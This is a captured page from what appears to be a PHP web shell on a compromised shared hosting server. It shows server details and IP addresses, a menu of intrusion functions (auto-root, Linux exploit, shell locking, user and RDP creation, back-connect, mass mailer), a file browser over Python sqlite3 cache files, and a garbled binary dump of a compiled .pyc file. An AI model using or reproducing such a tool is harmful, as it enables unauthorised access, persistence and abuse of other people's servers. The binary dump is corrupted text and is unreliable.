Linux premium134.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.104 | : 216.73.216.51
Cant Read [ /etc/named.conf ]
?8.1.34
mfbsrygq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
lib64 /
python3.12 /
sqlite3 /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-312.opt-1.pyc
1.79
KB
-rw-r--r--
__init__.cpython-312.opt-2.pyc
825
B
-rw-r--r--
__init__.cpython-312.pyc
1.79
KB
-rw-r--r--
__main__.cpython-312.opt-1.pyc
5.45
KB
-rw-r--r--
__main__.cpython-312.opt-2.pyc
4.79
KB
-rw-r--r--
__main__.cpython-312.pyc
5.45
KB
-rw-r--r--
dbapi2.cpython-312.opt-1.pyc
4.93
KB
-rw-r--r--
dbapi2.cpython-312.opt-2.pyc
4.93
KB
-rw-r--r--
dbapi2.cpython-312.pyc
4.93
KB
-rw-r--r--
dump.cpython-312.opt-1.pyc
3.59
KB
-rw-r--r--
dump.cpython-312.opt-2.pyc
3.3
KB
-rw-r--r--
dump.cpython-312.pyc
3.59
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __main__.cpython-312.pyc
� �֦i � � � d Z ddlZddlZddlmZ ddlmZ ddlmZ dd�Z G d� de� Z d � Zed k( r eej dd � yy) z�A simple SQLite CLI for the sqlite3 module. Apart from using 'argparse' for the command-line interface, this module implements the REPL as a thin wrapper around the InteractiveConsole class from the 'code' stdlib module. � N)�ArgumentParser)�InteractiveConsole)�dedentc � � | j |� D ] }t |� � y# t j $ r�}t |� j } t |� d|j � d|� �t j �� n/# t $ r# t |� d|� �t j �� Y nw xY w|st j d� Y d}~yY d}~yd}~ww xY w)z�Helper that wraps execution of SQL code. This is used both by the REPL and by direct execution from the CLI. 'c' may be a cursor or a connection. 'sql' is the SQL string to execute. z (z): )�filez: � N)�execute�print�sqlite3�Error�type�__name__�sqlite_errorname�sys�stderr�AttributeError�exit)�c�sql�suppress_errors�row�e�tps �)/usr/lib64/python3.12/sqlite3/__main__.pyr r s� � � ��9�9�S�>�C��#�J� "���=�=� � �!�W� � �� 1��R�D��1�-�-�.�c�!��5�C�J�J�G��� 1��R�D��1�#�,�S�Z�Z�0� 1����H�H�Q�K�K� �� �s8 �!$ �C�C� -A;�:C�;)B'�$C�&B'�'C�Cc �* � � e Zd ZdZ� fd�Zdd�Z� xZS )�SqliteInteractiveConsolezA simple SQLite REPL.c �Z �� t �| � � || _ |j � | _ y )N)�super�__init__�_con�cursor�_cur)�self� connection� __class__s �r r z!SqliteInteractiveConsole.__init__( s% �� � ������ ��%�%�'�� � c � � |xdk( r t t j � � yxdk( r t d� ydk( rt j d� y t j |� syt | j |� y)z�Override runsource, the core of the InteractiveConsole REPL. Return True if more input is needed; buffering is done automatically. Return False is input is a complete statement ready for execution. z.versionz.helpzEnter SQL code and press enter.z.quitr TF)r r �sqlite_versionr r �complete_statementr r"